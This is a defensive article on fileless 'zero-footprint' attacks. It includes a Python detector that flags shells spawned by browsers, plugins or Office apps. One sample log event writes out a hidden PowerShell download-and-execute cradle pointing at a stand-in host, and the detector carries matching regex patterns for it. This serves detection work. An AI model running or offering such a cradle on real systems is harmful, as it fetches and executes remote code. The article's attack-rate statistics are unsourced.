Protecting Your System from Zero-Footprint Cyber-Attacks
Cybercriminals are continually on the lookout for ways to attack your system without being detected. An increasingly common tactic is the zero-footprint attack, also known as a fileless or macro attack. This type of attack does not install software on a computer, so many antivirus tools are likely to miss it. Reports indicate that zero-footprint attacks are ten times more likely to succeed than file-based attacks, and they estimate that over 75% of successful cyberattacks in 2017 were fileless.
Zero-footprint attacks evade whitelisting by taking advantage of applications that are already installed on the system and are on the approved whitelist. These attacks typically rely on a user clicking a suspicious link or opening a malicious file; however, they don’t need to install detectable files on a computer’s hard drive to compromise the system. Instead, they run malicious code or launch scripts that infect endpoints directly from memory, without leaving easily discoverable artifacts behind.
Anatomy of a Zero-Footprint Attack
Here’s an example of how a zero-footprint attack works:
- A user clicks a link to a malicious website.
- The website loads Flash.
- Flash is used to open the Windows PowerShell utility.
- PowerShell downloads a script from a server and executes the script through the command line while operating in memory.
- The PowerShell script locates the user’s critical data and sends it to the attacker.
Detecting Zero-Footprint Attacks
Fortunately, the zero-footprint moniker is a misnomer. There are ways to detect malware even if it isn’t installed on your file system. Some antivirus software can spot the malicious attachment or link, even when there is no executable file installed. However, zero-footprint malware is hidden in RAM, and many antivirus programs only analyze the digital signatures of files stored on a hard drive to identify malicious files; they do NOT inspect memory directly, so fileless attacks often go undetected for longer.
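The chain described above (Flash launching PowerShell, which fetches a script and runs it in memory) writes nothing to disk, but it still produces process-creation and command-line telemetry. The following Python is an added example, not code from the original article: it scans constructed process-creation events for a shell spawned by a browser, plugin or office application and for command-line fragments typical of an in-memory download-and-execute. The event format, the parent and shell lists and the patterns are assumptions to be tuned per environment, and the office-document case extends the page's macro-attack remark.

```python
import re
from dataclasses import dataclass, field

# Constructed sample process-creation events (not from any real product's log).
# The second line mirrors the anatomy above: Flash spawns PowerShell, which pulls
# a script over the network and runs it in memory. The others are benign or partial.
SAMPLE_EVENTS = [
    "parent=chrome.exe child=FlashPlayerPlugin.exe cmd=FlashPlayerPlugin.exe",
    "parent=FlashPlayerPlugin.exe child=powershell.exe cmd=powershell.exe -w hidden -nop "
    "-c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')",
    "parent=explorer.exe child=powershell.exe cmd=powershell.exe -File C:\\Scripts\\backup.ps1",
    "parent=winword.exe child=cmd.exe cmd=cmd.exe /c dir",
]

EVENT_RE = re.compile(r"parent=(?P<parent>\S+) child=(?P<child>\S+) cmd=(?P<cmd>.*)")

# Interpreters a fileless chain typically lands in (assumed list; tune per environment).
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
# Parents that have no business launching a shell: browsers, plugins, office apps.
UNEXPECTED_PARENTS = {"chrome.exe", "firefox.exe", "iexplore.exe",
                      "flashplayerplugin.exe", "winword.exe", "excel.exe"}
# Command-line patterns for "download a script and execute it from memory".
IN_MEMORY_MARKERS = {
    "download cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest"),
    "in-memory eval": re.compile(r"\biex\b|invoke-expression"),
    "encoded command": re.compile(r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}"),
    "hidden window": re.compile(r"-w(indowstyle)?\s+hidden"),
}

@dataclass
class Finding:
    parent: str
    child: str
    reasons: list = field(default_factory=list)

def analyze(line):
    # Return a Finding for one event line, or None if nothing looks suspicious.
    m = EVENT_RE.match(line)
    if not m:
        return None  # malformed line: skip rather than crash
    parent, child, cmd = (m[g].lower() for g in ("parent", "child", "cmd"))
    if child not in SHELLS:
        return None
    reasons = []
    if parent in UNEXPECTED_PARENTS:
        reasons.append(f"{child} spawned by {parent}")
    reasons += [name for name, rx in IN_MEMORY_MARKERS.items() if rx.search(cmd)]
    return Finding(parent, child, reasons) if reasons else None

def scan(events):
    # Run analyze() over every event and keep the hits, preserving order.
    return [f for f in map(analyze, events) if f is not None]
```

Calling `scan(SAMPLE_EVENTS)` flags the Flash-to-PowerShell event on four grounds and the Word-to-cmd event on one, while the scheduled backup script run from Explorer passes.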
Combatting Zero-Footprint Attacks
Here are some basic precautions you can follow to help secure your system and prevent zero-footprint attacks:
- Apply all the latest security updates and patches to your operating system, and ensure that all software applications are patched and updated to their latest version
- Educate your users on the dangers of downloading email attachments or clicking on suspicious links
- Restrict access to administrative tools like WMI, PowerShell, and AppleScript that cybercriminals can leverage for attacks
- Restrict the number of domain administrators who have full access to domain settings
- Harden your firewalls, endpoint protection, email security, and web blockers
- Employ behavior-based network security that enforces rules based on users’ actions and does not rely on signature-based malware detection.
No system for combatting zero-footprint attacks is foolproof; however, vigilance and robust threat prevention tools can slow down or derail cyberattackers and increase the probability that they will make mistakes that expose their presence or reveal their attack vector.